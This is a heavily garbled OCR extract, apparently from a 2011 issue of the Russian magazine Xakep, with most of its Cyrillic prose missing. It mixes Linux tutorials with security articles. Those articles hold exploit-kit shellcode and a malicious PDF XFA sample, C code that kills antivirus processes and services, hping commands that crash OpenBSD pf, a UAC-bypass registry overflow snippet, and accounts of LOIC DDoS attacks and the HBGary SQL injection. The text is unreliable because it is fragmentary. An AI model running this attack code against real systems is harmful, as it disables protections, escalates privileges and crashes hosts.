. eval fromCharCode
. document , innerHTML #va
{background:url(data:,ring.from4harCo)}. va eval ring.from4CharCo
X 06 /149/ 2011
. 2. ,
html-
fromCharCode. eval?
, .
eval
. :
document.write(
'<center><h1>404 Not Found</h1></center><hr>');
,
404, , , .
, .
, html , ,

.
,
.
, :
CVE-2010-1885, CVE-2010-4452, CVE-2010-3552, ADODB.Stream
CVE-2010-0188. .
CVE-2010-1885
VBS-,
ADODB.Stream, 2004 (!) .
. ,
. . ,
, :).

MSXML2.XMLHTTP, ADODB.Stream Wscript. ,
, .
069
MALWARE
. 4. VBS-, ADODB.Stream
CVE-2010-4452
pushad
xor
mov
mov
mov
mov
mov
mov
cmp
jne
mov
popad
retn
, CVE2010-4452. Oracle
. Java .
code codebase <applet>
. ,
, ,
. :
IP- . , http://1476066051, .
ecx,ecx
esi,fs:[ecx][30]
esi,[esi][0C]
esi,[esi][1C]
ebx,[esi][08]
edx,[esi][20]
esi,[esi]
[edx][18],cx
[esp][1C],ebx
CVE-2010-3552
, ,
CVE-2010-3552. - Java Runtime Environment.
Java- launchjnlp, docbase
sprintf. , . -
kernel32 PEB:
API- (.
. 8.). urlmon.dll
URLDownloadToFile, .
Help and Support

Center
,
OC Windows Help and
Support Center. , -
. 5. , CVE-2010-1885
070
X 06 /149/ 2011
. 6. JavaScript', CVE2010-1088
. 7.
<pageSet>
<pageArea id="roteYom" name="roteYom">
<contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/>
<medium long="792pt" short="612pt" stock="default"/>
</pageArea>
</pageSet>
<subform h="756pt" w="576pt" name="qwgwqgwqg">
<field h="65mm" name="favwwbw" w="85mm" x="53.6501mm"
y="88.6499mm">
<event activity="initialize" name="loxRote">
<script contentType="application/x-javascript">
. 8. ,
API-
,
hcp://. , ,
html, . ,
, <div> .
. , , ,
CVE-2010-1885 (. . 5).
, , hcp://
%A.
, : SaveToFile, GET,
Adodb.Stream, WshShell.Run, MSXML2.XMLHTTP .

. ,
, .
Adobe Reader
Adobe Acrobat
,
PDF-, PE, . , :
- Adobe Reader Adobe Acrobat.
PDF. XFA
JavaScript. :
<template xmlns="http://www.xfa.org/schema/xfa-template/2.5/">
<subform layout="tb" locale="en_US" name="asfaewf">
X 06 /149/ 2011
, subform pageArea,
,
. initialize, 'event activity='.
.
, ,
. <div>
-.
Adobe,
. ,
favwwbw.rawValue ( favwwbw ) TIFF-.
, - .
(. . 7), . . UPX,
'upx d',
. , .
, ,
.
. ,
, :). z
071
MALWARE
RankoR (ax-soft.ru)
BEGINNERS EDITION
AVG, Trend
Micro Microsoft Security Essentials

- . ,
. ?
?
,
, . ,
:
Trend Micro - .
2007 .
AVG Internet Security 2011 ( )
, .
072
Microsoft Security Essentials .
. ,
. , () ,
X 06 /149/ 2011
AVG

.

Oracle VirtualBox Windows
XP SP3. ,
.
.
,
.
(VirtualBox Hostonly Ethernet adapter).
192.168.56.0/24.
192.168.56.102. C:\Share\
fuckAv.
IDE Visual Studio 2010, . ,
Debugging.
Debugger to launch Remote Windows Debugger;
Remote Command C:\Share\fuckAv\fuckAv.exe;
Working directory C:\Share\fuckAv;
Remote Server Name 192.168.56.102;
Connection Remote with no authentication (Native
only);
Debugger Type Native Only.

x86 ,
msvsmon.exe.

, , IDE .
( ) .
:
,
,
.
.

( ).

user-mode .
2 5
.
X 06 /149/ 2011
Epic Fail Microsoft
.
,
. ,
:
bool killProcessByPID(int PID)
{
return TerminateProcess(OpenProcess(
SYNCHRONIZE | PROCESS_TERMINATE, false, PID),
0);
}
,
SYNCHRONIZE PROCESS_TERMINATE, . ?
Microsoft
Security Essentials. , ,
, . ,
.
, :).
Trend Micro.
, , SYSTEM,
, usermode
. , ,
. , Trend Micro
.
AVG.
:
, . ,
Access Denied. .
DVD
dvd

Visual Studio
2010.
WARNING
warning
,
,

.
Service Permanently
Unavailable
, .
, ,
- . .
, .
073
MALWARE

bool stopService(const char *svcName)
{
SC_HANDLE scManager = NULL;
SC_HANDLE scService = NULL;
bool result = false;
SERVICE_STATUS ss;
scManager = OpenSCManager(NULL, NULL,
GENERIC_ALL);
if ( ! scManager )
{
printf("[-] Failed to open SCManager: %d\n",
GetLastError());
Trend Micro
return false;
}
, , Essentials. , ,
. ?
,
:
scService = OpenService(scManager, svcName,

GENERIC_ALL);
if ( ! scService )
{
printf("[-] Failed to open the service: %d\n",
GetLastError());
if ( result )
result = DeleteService(scService);
, ... ? MS SE, . ,
. , . .
.
Trend Micro . ,
, .. ,
, ERROR_INVALID_SERVICE_CONTROL. : DeleteService
true, . ,
.
AVG 2 avgwd
AVGIDSAgent. , . .
File not found
,
, . , ,
. :
bool removeFolder(const char *file)
{
return MoveFileEx(file, NULL, MOVEFILE_DELAY_UNTIL_REBOOT);
}
, MoveFileEx
, , ,
MOVEFILE_DELAY_UNTIL_REBOOT ,
.
,
() ,
. ,
. MS Security Essentials
, GUI. , Trend Micro, -
074
return false;
}
result = ControlService(scService,
SERVICE_CONTROL_STOP, &ss);
CloseServiceHandle(scService);
CloseServiceHandle(scManager);
return result;
}
.
exe,
4.
AVG
removeFolder("C:\\Program Files\\AVG\\AVG10\\avgui.
exe"); GUI ,
/dev/null.
..
, . .
, ,
.
, .
-
,
.
n- , , :). ,
: , ,
, ?
, ,
? z
X 06 /149/ 2011
MALWARE

.
?
BCG- (
, Boston Consulting
Group). :
,
. ,
,
, , . ?
CISCO
IT-, , , . .
Web-
()
VoIP
()
DDoS-
.
.
scareware
( ), ( ),
. ,
.
X 06 /149/ 2011
.
,

.
/
-,
,
, , .
.

.
. :
,
,

, DDoS-. ,
-
, .
.
,
,
(
),
( ).
CISCO
VoIP ,
, , . z
075

Mifrill (mifrill@real.xakep.ru)

. WIKILEAKS, THE PIRATE BAY, ,
, . ,
.
,
. .
. . .

Anonymous ( .,
), , ,

. , ,
-
Anonymous. ,
, -, . ,
, , ,
, ,

.
?
2003 ,
Anonymous
( !) ,
2ch 4chan,
Encyclopedia Dramatica,
( , ) .
.

. ,

,
,
076
, .

.
,
, , , , ... -,
, ,
:). , . , .

The Pirate Bay
,
Anonymous
. -
, , .

. ,
, , . ,
, , 75 000 000

.
,
, ,
.
( , )
.

,
.
.
, 2008 YouTube

(, , YouTube ),
-
.
, ,
,

.
, , ,
YouTube,
.

YouTube .
(Project Chanology),
DDoS- ,

,
YouTube.
.

X 06 /149/ 2011

,
-

. ,
. ,
C , .
: , .
,
. ,
,
. . . . . .
..
YouTube .
X 06 /149/ 2011
,
93- ,
, , , , , .

V / V . , , . V
, -,

I 1605 . ,
,

, .
.
( )
. , .
2009 ,
The Pirate
Bay. (,
077

), Bailout.
,

, .
17 ,
.
,
MAQS,
. 20 ,
,
DDoS-
ifpi.org, ifpi.com, ifpi.se maqs.com.
,
MPAA (
) MAQS,
,
. , ,
.

700 1000 .

IRC- (,
IRC, Twitter): irc.anonnet.org #tpb,
irc.raidchan.org #seedsofliberty, irc.anonnet.
org #888chan, irc.freenode.net #fuckifpi.
(
) LOIC
(Low Orbit Ion Cannon) , C# 4Chan.
, -
. TCP-,
UDP- HTTP- ,
. ,
,
. LOIC
,
.

( )
,
Twitter
078
Anonymous
HBGary
V V
,
.
Wikileaks HBGary
, ,

.
, , ,
. ,
Anonymous -
, .
YouTube,
Tumblr .

.

Wikileaks .
,
- :
,

(Moneybrookers, Visa, Masterard PayPal),
,
.
-,
,
.
,
.
2010 ,
: 8 10
LOIC 30 000 , ,

50 000. .
Payback
( .),
DDoS.
,
,
web-

,
. PayPal,
- . ,
:
,
, . DDoS .
. ,
IRC-.
DDoS:
MyFax.com
FaxZero.com.
Tor -.
Anonymous Wikileaks.
X 06 /149/ 2011
RSA 2011
( ),
, HBGary

, , ,
.

,
,
. ,
,
,
.
, , ,
.
, ,
, .
,
,
,
- .
, .
- DDoS,
-
:). ( )
,
.

HBGary Federal, .
- , .
HBGary
IT : , ,
, ,
,
. HBGary Federal
,
.
, -
.
,
- - DDoSX 06 /149/ 2011
,
.
Anonymous . .
, , , ,
LOIC
,
.
,
,
.

, .

, 20- .

DDoS-

.

?, . : . ,
,
.
,
, !
post factum ,
,
, , .
, .
, , .
(Goodspeak,
CogAnon) IRC-
,
.
,
,
, - .
, .
Facebook Twitter,
Google, . -
, ,
.
...

Financial Times,
, 45
Anonymous,
,
. , :
, , ,
. 30
10
.
-,
Q .
-
.

Financial Times,
anonnews.org
:
9000
- IRC-, ,

,
.
,

.
,
HBGary, , , .
,
079
: Keylogger 12
Monkeys. $60 000,
$240 000. ,
, HBGary
0day-, ,
. .
-
, .
. ,
.
DDoS .
Anonymous
,
.
DDoS-
hbgaryfederal.com. ,
,
.

,
. , , .
... hbgaryfederal.com SQL-.
CMS , . ,
: hbgaryfederal.com/pages.
php?pageNav=2&page=27.
,
, HBGary MD5 ,
, .

.
- ,
.
hbgaryfederal.com, Twitter, Facebook
LinkedIn , , hbgary.com rootkit.org, .
, ,
, 60
000 , , .
, iPad
:).
080
,
, ][
: www.xakep.ru/post/54902.
, , ,
.

.
,
.
:
. , ?
. ,
,
IRC. ,
, ?
!.
,
,
.
,
, , ,
. ,
,
.
, ,
. ,
TPB: thepiratebay.org/
torrent/6156166/HBGary_leaked_email.
, HBGary
. ,
,
(Palantir
Berico Technologies), Wikileaks.
,
WikiLeaks, , .
WikiLeaks . ,
, ,
.
, , , HBGary

HBGary
Federal,
.
, IT
,
. , .

,
.
HBGary, McAfee, ,
. - ,
: .
Anonymous, ,
.
: www.
facebook.com/anonleaks. ,
. -

Forbes, 16-
,
HBGary. ,
,
, ,
e-mail,
microSD-.
HBGary
, Sony,
,

.
PlayStation
Network ,
- , ...
, ,
,
PSN
.
70 000 000 !
, , ,

. ,
, , .
. z
X 06 /149/ 2011
UNIXOID
(execbit.ru)
CoLinux
Guest
Linux
Intermediate
0xFFFFFFFF
Host OS
0x80000000
... . , ,
, . - - .
.

IT.
,
. , , ,
082
, .
FreeBSD Solaris
:
FreeBSD Jail Solaris Zones.
, qemu
FreeBSD VirtualBox Solaris (
X 06 /149/ 2011
QEMU VM
Guest
vdagent
qxl driver
standart guest drivers
vmc
virtio-serial
QXL
(cirrus)
Keyboard
Mouse
Tablet
AC97
ES1370
inputs
record
playback
(nic)
spice server
main
display
cursor
(tunnel)
spice client
SPICE
user's machine

LXC
DVD
LXC

, .
/etc/fstab:
dvd
cgroup /var/cgroup cgroup defaults 0 0
CoLinux
/etc/network/interfaces (
Debian/Ubuntu- ):
auto br0
iface br0 inet dhcp
bridge_ports eth0
bridge_fd 0
qemu). Linux . qemu-kvm, KVM,

,
,
Linux-VServer OpenVZ. ,
:
, , Linux, ,
(
, ).
LXC,

. LXC (LinuX Containers)
Linux-VServer OpenVZ, X 06 /149/ 2011
(printer)
, ,
,
(namespaces)
(cgroups),
Linux-. Linux namespaces

-.
,
, ( chroot),
, IPC . , ,
,

.

cgroups,
( ,
, ).

, cgroups
(
, , ,

qemu
SPICE

Fedora 14 RHEL6,

Red Hat Enterprise
Virtualization for
Desktops.
HTTP://WWW
links

SPICE:
spice-space.org;
LXC: lxc.sf.net;
CoLinux: colinux.
org;
AndLinux: andlinux.
org.
083
UNIXOID
getty ( root:root).
-
,
/var/lib/lxc//rootfs, /var/lib/
lxc//config. , LXC , , (
cgroups ),
.
CoLinux Windows
libcgroups). , ,
LXC,
namespaces cgroups.
. LXC .
, Ubuntu,
(
LXC, ):
1. LXC :
$ sudo apt-get install lxc bridge-utils
2. , , LXC ( , LXC ,
):
$ sudo lxc-checkconfig
3. cgroups :
$ sudo mkdir /var/cgroup
$ sudo mount -t cgroup cgroup /var/cgroup
4. ,
(-
):
$ sudo brctl addbr br0
5. Ubuntu ( ) (LXC "",

/usr/lib/lxc/templates,
, ,
):
$ sudo apt-get install debootstrap
$ sudo lxc-create -n ubuntu -t ubuntu \
-f /usr/share/doc/lxc/examples/lxc-veth.conf
'-t' , '-f' .
6. :
$ sudo lxc-start -d -n ubuntu
$ sudo lxc-info -n ubuntu
sudo lxcconsole -n ubuntu.
084
,
, ,
.

, ,
.
, .
web-,
- : gmail, rss- google reader,
google docs web
2.0. , . , web-,
,
.
Photoshop, 3D Max
, , Crysis.
, Windows Linux,
,
.
: Remote Desktop
. , Photoshop 3D Max,
, ,
. ,
.
SPICE (Simple Protocol for Independent Computing
Environment
), Red Hat 2009 ,
.
SPICE ,
- ,
, .
SPICE , , .
,
( SPICE- ).
QXL,
.
,
QXL- ( VGA-), SPICE-,
. ,
, QXL
, , -,
, -,
. ,
QXL-
,
, X 06 /149/ 2011
LXC
SPICE ,
qemu,
, :
1. qemu '-spice':
lxc-checkconfig , LXC
(
QXL- );
,
(Quic, Lemel-Ziv, Global LZ),
; M-JPEG
.
SPICE , . ,
QXL . ,
.
QXL-,
.
.

.
SPICE ,
QXL.
,
- ,
.
SPICE
. , , ,
, ,
. , .
QXL, , .
: (,
QXL).
SPICE-
. , SPICE
,
.
. , , , (, ,
WiMAX-), SPICE QXL-
, ( ,
). .
X 06 /149/ 2011
$ qemu-kvm -spice port=1234,disable-ticketing \

-hda ///
2. SPICE- (
spice-client), :
$ spicec -h localhost -p 1234
,
'disable-ticketing' 'password='.
Linux
, , Windows Linux,
.
- , ,
. ,
, .

, .
,
. , ,
Windows , MS Office, . Wine,
-

Windows .
Wine , , ,
Windows. Cooperative Linux ( CoLinux)
. Wine
.
Wine, , Win32 Linux
, , CoLinux
Linux,
( , ,
).
CoLinux , Windows-. ,
Windows. ( , , ) CoLinux
085
UNIXOID
LXC-
( Windows).
Windows-
. CoLinux conet,
Windows ,
. cocon Linux,
Windows, Windows-,
CoLinux--.
CoLinux cobd,
,
Windows. X- Xming, Windows ( ,
X , , ,
, Windows,
CoLinux ).
PulseAudio, Windows
.
CoLinux .
Linux- Windows, , .
, Windows
Linux ,

. /
/ ? Windows
, .
, CoLinux ,
Linux. ,
(, Ubuntu CoLinux
9.04). AndLinux (andlinux.org)
Ubuntu 22 2009 , (KDE
XFCE-, CoLinux Ubuntu
40 ).
AndLinux ,
Windows- (goo.gl/jKhyZ) ,
, Windows.
AndLinux ,
086
. CoLinux: 0.7.4 0.8.0. ,

. ,
CoLinux: 128 , 192 1 .
, Windows,
.
Xming, PulseAudio .
AndLinux , :
NT-. , CoLinux
, . AndLinux
(, UNIX,
),
Windows CoLinux: ,
CoFS Samba (
) , ,
.
CoLinux (, Windows, , ).
AndLinux, ,
freedesktop.
XFCE-: , ,
Thunar Synaptic. KDE- AndLinux KDE 3.5.
- CoLinux
, .

.
,
. -

, .
,
. z
X 06 /149/ 2011
Adept (adeptg@gmail.com)
*nix
,
31 000 000 OpenSource-, 2 000 000 000 . ,
, .
.

,
: , . 30 ,
. , 4.1BSD
( , ),
BSD-.
Samba . ,
2008 , . Samba,
OpenBSD libc ( ,
lib/libc/gen/{readdir.c,telldir.c},
).
Samba - ,
- . , -
088
BSD-, Mac OS X.
, ,
-. 33 .

.
2008. malloc OpenBSD, . sparc64 ,
C++
Internal Compiler Error.
yacc(1): skeleton.c, yyparse(),
.
OpenBSD ,
. (
X 06 /149/ 2011
Load_Cycle

OpenSource-

Mozilla Russia.
, . -,
The Mozilla Security Bug Bounty Program
, ,
( ,
).
$3000 :).
Chrome/Chromium
Vulnerability Rewards Program.
$500 $1337.
), UNIX V6
( 1975) UNIX V7.
GRUB2,
1.97 ,
.
,
GRUB
. , xakep,
xake, xak, xa
x. ,
, .
1.97.1.
Ping of Death OpenBSD Packet
Filter (CVE-2009-0687), 9 2009
.
,
kernel panic . .
, OpenBSD

.
OpenBSD pf 4.5, ,
NetBSD 5.0 RC3. , , :
nmap -sO $target_IP
hping -0 -H 58 $target_IP
,
OpenBSD,
.
, 2005 - ral(4) IPsec
X 06 /149/ 2011
,
2 -. .
.: ,
Wi-Fi.
,
remote crash, pf.conf,
isakmpd.conf isakmpd.policy, traceback ,
ddb(4).
,
. , ,
Android- HTC G1. ,
.
, , SMS reboot, <Enter>, ,
. !
G1
Debian. , ! :)
,
. ,
,
. ( , ) Ubuntu
.
,
( ).
.
(
).
Ubuntu ,
.
.

. ,
, .
smartmontools:
INFO
info
Ubuntu Hundred
Paper Cuts ,

100
,
.
HTTP://WWW
links

BSD:
goo.gl/qH316;
Ping of Death
OpenBSD:
goo.gl/uHoCj;
Linux:
goo.gl/LJ2B1.
$ sudo apt-get install smartmontools
sda, :
$ sudo smartctl -a /dev/sda | grep Load_Cycle
. 13 137,
. ,
,
600 000. /-
089
UNIXOID
bug#1 bugs.launchpad.net
,
, .
, ,
8.04 ( ). ,
APM (Advanced Power
Management):
$ sudo hdparm -B 254 /dev/sda
( ,
APM
APM ),
goo.gl/bTNhy,
.
, . ,
OpenSource . ,
*nix-. Nvidia. 2010
196.75 195.36.
. , ,
,
.
, .
, .
,
, , *nix-.
, , , :
Firefox *nix (goo.gl/Hiagm).
2001 , , Firefox 3 beta 2.

Russian hot keys bugfix. ,

Mozilla Russia. . Mozilla Russia
, .
$300 $500,
, , : goo.gl/dhYxN.
OpenSource- .
,
X.Org, ,
. :
, .
: ,
<Alt+Shift>.
090
Nautilus Filename Repairer .

:)
(Alt+Shift+Tab) .
X.Org 2004 : goo.gl/GaRqQ. , ( ),
, XKB. ,
, :).
, , XKB2 (
).
, Ubuntu (
11.04). X.Org
ppa. : goo.gl/7E6uK.
FreeBSD
.
: USB-, , , Kernel Panic.
FreeBSD
, USB-.
, , RAR ZIP-,
Windows. RAR , ,
:
$ sudo apt-get remove rar
$ sudo apt-get install unrar
ZIP . launchpad goo.

gl/Y5YVj, (,
) 1000 ( launchpad
), .
HundredPaperCuts
, .
(, , ). ,
.
1. AltLinux, .
2. AltLinux .
, ,
. zip/unzip,
libnatspec. Ubuntu ppa: goo.
gl/AFSQq ( zip/unzip) goo.gl/eGGAe (
libnatspec).
3. - unzip: goo.gl/0Bd9Y. ,

.
4. convmv
X 06 /149/ 2011
zip-
,
elevator=deadline. grub
GRUB_CMDLINE_LINUX_DEFAULT
/etc/default/grub, :
$ sudo update-grub
2. swap:
# echo 10 > /proc/sys/vm/swappiness
OpenBSD remote crash vulnerability

( ):
$ convmv -f cp866 -t utf8 -r --notest *
5. Nautilus:
$ sudo apt-get install nautilus-filename-repairer
#12309. 12309 -,
. , Linux vs FreeBSD vs
Windows.
. Large
I/O operations result in poor interactive performance and high iowait
times, 550 : goo.gl/
uMKEn. 2008
P1 high. ,
, . :
$ dd if=/dev/zero of=/tmp/test bs=1M count=1M
, . wa ( LA),
, , ,
12309.
12309 , ,
. :
(
);
(, , );
USB-;
;
, :
1. - - -cfq. :
$ cat /sys/block/sdX/queue/scheduler
sdX ( sda).
.
:
swap ,
10%. Ubuntu, , swappiness 60.
, /etc/sysctl.conf.
3. . swap.
4. -
2.6.17 2.6.34.
, 12309, < 2.6.35.
USB-.

Ubuntu, bugs.launchpad.net, 20 2004 Microsoft has a majority market share.
. :
Microsoft . Ubuntu
, . IT-, IT
.
.
:
.
:
1. .
2.
Ubuntu / .
:
1. Ubuntu.
2. Ubuntu , .
3.
.
,
619 , 1500 . :).
, OpenSource .
.
OpenSource ,
. z
# echo deadline > /sys/block/sdX/queue/scheduler

X 06 /149/ 2011
091
UNIXOID
(execbit.ru)

.
,
.

. .
- ,
.
, fail safe,
Grub . , , ,
. KDE Gnome
,
.
: ( KDE
kdm, Gnome gdm) ,
092
(kdm gdm
, ).
.
ArchLinux Wiki (wiki.
archlinux.org). , .
/etc/inittab :
x:5:once:/bin/su _ -l -c "/bin/bash
--login -c startx >/dev/null 2>/dev/null"
,
X 06 /149/ 2011
easystroke
(
: id:5:initdefault:).
,
, ~/.xinitrc. ,
KDE,
exec startkde, Gnome exec gnome-session,
Fluxbox exec fluxbox .
, ,

.
WM

,
,
. EWMH (Extended Window
Manager Hints), , ,
-,
(, WM
Gnome - , Metacity,
Gnome
), -,
EWMH- WM , - .
, - ,
EWMH-
WM. wmctrl,
,
, , . , wmctrl
,
,
.
. ,
,
. , -
( ).
,
WM,
. , wmctrl
:
# vi ~/bin/wm-startup.sh
#!/bin/sh
#
X 06 /149/ 2011
Firefox Gnome Do
chromium &
audacious &
xterm -c mcabber &
# ,

sleep 5
# chromium

wmctrl -r chromium -t 2
wmctrl -r chromium -b add,fullscreen
# audacious,
wmctrl -r audacius -b add,shaded
# xterm mcabber
,
(50,50)
wmctrl -r mcabber -t 2
wmctrl -r mcabber -e 0,50,50,600,300
# chromium ,

wmctrl -a chromium
, mcabber
, , mcabber
, ,
, wmctrl.
, , -, wmctrl

, -, xterm ,

.
. , ,
. , ,
, IM-,
/ .
, , ,
, .
wmctrl:
INFO
info

xneur,
,
,

=

.
xneur

gxneur
(xneur.ru/downloads/).

xmodmap X.Org.

xbindkeys
(bit.ly/8aHUib).
093
UNIXOID
gxneur
800x600
$ wmctrl -r mcabber -b toggle,hidden
. , , , .
, , (, ,
, yakuake
tilde, ,
wmctrl ).

, , ,
:
(, ), ( , ).
.
UNIX-
. WM
, ,
,
, ( ).
, . , : WM
,
.
pytyle (pytyle.com), WM,
. WM
,
.
, .
:
$
$
$
$
$
sudo apt-get install python-xlib

wget http://goo.gl/V6rWY
tar -xzf pytyle-0.7.5.tar.gz
cd pytyle-0.7.5
sudo python setup.py install
:
$ pytyle
094
pytyle Ubuntu 10.10

,
pytyle WM,
.
<Alt+A>,
<Alt+U>.
<Alt+Z> ( ). - ,
,
. :
Alt+J / Alt+K ;
Alt+H / Alt+L ;
Alt+Shift+C ;
Alt+M ;
Alt+C ;
Alt+Shift+D / Alt+Shift+B
.
pytyle EWMH,
- WM (
EWMH- WM , , :
en.wikipedia.org/wiki/EWMH).
, Mac OS X - ?
, , , - , : , Launcher,
,
, <Alt+F2>.
,
:
, , , , , , . ,
.
( ) Mac OS X Launcher KDE4.
<Alt+F2>, ,
.
, . ,
Gnome XFCE - , , <Alt+F2>, .
. , Gnome Do (do.davebsd.
com) Launchy (launchy.net). .
, , mono
X 06 /149/ 2011
notify-send WM
Gnome Do QT Launchy (, , Linux
).
,

. , python, ruby , , ,
bash?
, bash .
,

.
zenity (live.gnome.org/Zenity). gdialog, , ,
dialog ( , ,
Slackware Linux).
,
, .
,
Hello World!:
$ zenity --info --text "Hello World\!"
('--entry'),
('--error'), ('--list'), - ('--progress'),
('--calendar') .
( ,
) ,
.
Zenity
, ,
notify-send.
. libnotify,
(
WM DE).
:
$ sudo apt-get install libnotify-bin
$ notify-send "Apache !"
:
$ notify-send -i gtk-dialog-info -u critical \
" 99%!"
Windows
Punto Switcher. ,
X 06 /149/ 2011
,
. Linux ( *nix) xneur (X Neural Switcher)
, Windows, ,
.
xneur ,
, , .
, xneur, .
xneur , Linux,
,
vim
xneur ( ,
).
xneur,
:
$ cp /usr/etc/xneur/xneurrc ~/.xneur/xneurrc
:
$ vi ~/.xneur/xneurrc
#
ManualMode Yes
# , xneur

SetAutoApp Pidgin
SetAutoApp Psi
SetAutoApp Gedit
SetAutoApp Chromium
# , xneur
ExcludeApp Focuswriter
ExcludeApp Wine
, ,
. ,
xneur ,
, , , .
.
xneur , :
xneur
Break ;
Shift+Break ;
Ctrl+Print ;
Alt+Scroll Lock
("" "privet");
Ctrl+Tab ;
Win+D
, xneur
, - , . , ,
, CapsLock,
095
UNIXOID
xneur
,
,
/ , .

,
. :
,
,
WM.
, xneur. xneurrc :

( ),
. :
, ,
, .
keytouchd,
,
( Debian/Ubuntu
).
,
.
,
, .
KDE, ,
.
: easystroke (sf.net/
apps/trac/easystroke):
$ sudo apt-get install easystroke
$ vi ~/.xneur/xneurrc
AddAction Alt t <cmd>gnome-terminal</cmd>
AddAction Alt g Gedit <cmd>gedit</cmd>
AddAction Super_L Nautilus <cmd>nautilus ~/</cmd>
,
, Google (Win+G) (Win+R).

,
.
.
.
KDE Gnome
, ,
- Fluxbox .
keytouch (keytouch.df.net),
096
,
.
. Add Action
, ( Command, ).

Stroke, .
() ( ,
).
, , (
, 10 10).
easystroke .

,
. , ,
. z
X 06 /149/ 2011
CODING
(stannic.man@gmail.com)
UAC

?
,
(UAC): ,
,
, .
, .
, UAC ?
Windows (, , ) ,
,
,
.
?,
: , ,
, ,
. , UAC , .
098
, ,
Windows.
,
,
. , ,
,
,
.
X 06 /149/ 2011
UAC
UAC
UAC ,
,
, . UAC

,
,
.
, UAC
, ,

Vista/7
UAC.
.
.

.
,
, .

API- ShellExecute
runas.
, ,
,

. : setup, install
update .

,
.
, ,

(appcompat).
, ,
RequireAdministrator RunAsInvoker.

X 06 /149/ 2011
requestedElevationLevel.
XML-, . Windows XP
DLL Microsoft .NET Framework.
trustInfo (
Firewallsettings.exe) , Windows Vista requestedElevationLevel. level
: asInvoker,
highestAvailable requireAdministrator.
<trustInfo
xmlns="urn:schema-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
Level="requireAdministrator"
uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
,
, ( Notepad.exe),
asInvoker.
,
.
highestAvailable. , , ,
AAM
,
.
,
highestAvailable,
Regedit.exe, Mmc.exe Eventvwr.exe. ,
requireAdministrator
,

.

uiAccess true
. ,

, %SystemRoot% %ProgramFiles%.
, , , Sigcheck Sysinternals. :
sigcheck m <executable>. ,
DVD
dvd
DVD
,
,

UAC Windows 7.
,
(
?!),

.
HTTP://WWW
links

? Go for
zerodayinitiative.com
$1000
$10 000
!
INFO
info
:

!
099
CODING
'// ,
'// WshShell.Run "shutdown /r /f"
-, - , Windows Script
Host (WSH), , , , .
.
UAC , ,
.
UAC
, ( AIS, %SystemRoot%\System32\
Appinfo.dll), Service Host (%SystemRoot%\
System32\Svchost.exe), Consent.
exe (%SystemRoot%\System32\Consent.exe). Consent , , , ,
,
.
,
.
UAC
, , , , . UAC? , . , , .
(
Windows?), UAC , ,
. , .

UAC? !
++ C#
SendKeys, VBS-.
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.SendKeys("^{ESC}")
WScript.Sleep(500)
WshShell.SendKeys("change uac")
WScript.Sleep(2000)
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{ENTER}")
WScript.Sleep(2000)
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{ENTER}")
'//
100
, UAC?
, Windows UAC .
,
UAC .
WinAPI RtlQueryRegistryValues (msdn.microsoft.com),
, , RTL_QUERY_REGISTRY_TABLE,
__in__out .
( Microsoft)
API , ,
: HKCU\
EUDC\[Language]\SystemDefaultEUDCFont.
REG_BINARY, RtlQueryRegistryValues
.
API- Win32k.sys!NtGdiEnableEudc HKCU\EUDC\[Language]\SystemDefaultEUDCFont,
, REG_SZ,
UNICODE_STRING, ULONG (
).
REG_BINARY, ,
.

UINT codepage = GetACP();
TCHAR tmpstr[256];
_stprintf_s(tmpstr, TEXT("EUDC\\%d"), codepage);
HKEY hKey;
RegCreateKeyEx(HKEY_CURRENT_USER, tmpstr, 0, NULL,
REG_OPTION_NON_VOLATILE, KEY_SET_VALUE | DELETE, NULL,
&hKey, NULL);
RegDeleteValue(hKey, TEXT("SystemDefaultEUDCFont"));
RegSetValueEx(hKey, TEXT("SystemDefaultEUDCFont"), 0,
REG_BINARY, RegBuf, ExpSize);
__try
{
EnableEUDC(TRUE);
}
__except(1)
{
}
RegDeleteValue(hKey, TEXT("SystemDefaultEUDCFont"));
RegCloseKey(hKey);
UAC . , , Windows
VIsta/W7 , .
. - ,
Windows.
,
IDA Pro WinDBG.
! z
X 06 /149/ 2011
>> coding
3 -
: 12 , 6
3 .
, ? ? .
- .
CODING
(seva@vingrad.ru)
SILVERLIGHT
Silverlight-
Silverlight, Flash,
web- . , , ,
, web-
. , Silverlight- web-.
HTML-
JavaScript.
DOM, JS
- , .
Rich Internet Application (RIA). Silverlight
.
ActiveX Microsoft
. , ,
,
RIA-.
Silverlight .NET, , Silverlight , , ,

ActiveX, , ,
.
Silverlight
Silverlight ,
web-
.
, -trusted ( ) Silverlight- ,
.
Silverlight ,
102
:
in browser mode Silverlight-
web- (sandbox),
, , JavaScript.
, SL-
object, .
out of browser mode ,
.
,
, inbrowser, SL-
.
out of browser trusted mode
Silverlight- ,
,
.
in browser,
Silverlight-,
web-.
Silverlight- ,
.
Sandbox
sandboxed- :
user initiated X 06 /149/ 2011

Silverlight
Rich Internet Application
Desktop
Applications
Web
Applications
RIA
Communication
Technologies
(, web-,
Silverlight) . KeyDown/KeyUp/MouseDown/
MouseUp.
, ,
. , , , - ,
, , .
same origin police
, , .
, , .

Silverlight:
1. OpenFileDialog/SaveFileDialog Silverlight
, ,
, .
X 06 /149/ 2011
. , Silverlight,
.
2. Webcam/Microphone SL- 4.0
web-,
, ,
. ,
SL- . : ,
web-.
3. Clipboard access 4.0 Silverlight
. ,
, .

Silverlight.
Silverlight isolated storage.
Silverlight
. Silverlight, ,
103
CODING

. 1 ,
.
- firewall Silverlight, , ,
, . SL ,
, ,
. Silverlight
, :
1. crossdomain.xml , Flash-:
Transparent
Silverlight-

Silverlight-
Transparent Code
<?xml version="1.0"?>
<cross-domain-policy>
<allow-http-request-headers-from domain="*"
headers="SOAPAction,Content-Type"/>
</cross-domain-policy>
SafeCritical Code
<?xml version="1.0" encoding="utf-8"?>

<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true"/>
</grant-to>
</policy>
</cross-domain-access>
</access-policy>
, <img> HTML, Image Media Silverlight

. - SL-, ,
. HTTP-, Silverlight
TCP/UDP-. ,
,
.
, TCP/
UDP- 4502-4534. . Silverlight- .
Silverlight
out of browser inbrowser-
Silverlight, ,
install Silverlight.
, SL- sandboxed,
trusted. Silverlight
, Silverligt-,
:
25 ;
( -trusted
, click jacking ,
